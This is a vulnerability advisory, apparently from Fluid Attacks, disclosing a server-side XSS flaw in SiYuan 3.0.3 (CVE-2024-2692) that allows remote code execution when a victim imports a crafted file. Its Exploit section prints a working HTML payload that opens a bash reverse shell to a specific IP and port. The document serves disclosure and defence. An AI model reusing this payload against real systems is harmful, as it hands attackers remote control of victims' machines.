SiYuan 3.0.3 - RCE via Server Side XSS
Summary
| Name | SiYuan 3.0.3 - RCE via Server Side XSS |
| Code name | |
| Product | SiYuan |
| Affected versions | Version 3.0.3 |
| State | Public |
| Release date | 2024-04-03 |
Vulnerability
| Kind | Server Side XSS |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
| CVSSv3.1 Base Score | 9.6 |
| Exploit available | Yes |
| CVE ID(s) |
Description
SiYuan version 3.0.3 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to Server Side XSS.
Vulnerability
A remote code execution vulnerability has been identified in SiYuan. This is possible when the victim imports a file containing a malicious HTML payload defined within it.
Exploit
<img src="1" onerror="require('child_process').exec('bash -i >& /dev/tcp/24.144.86.165/4444 0>&1');"/>
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2024-2692 to refer to this issue from now on.
System Information
-
Version: SiYuan 3.0.3
-
Operating System: MacOS
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/siyuan-note/siyuan/
Timeline
2024-03-18
Vulnerability discovered.
2024-03-19
Vendor contacted.
2024-04-03
Public Disclosure.
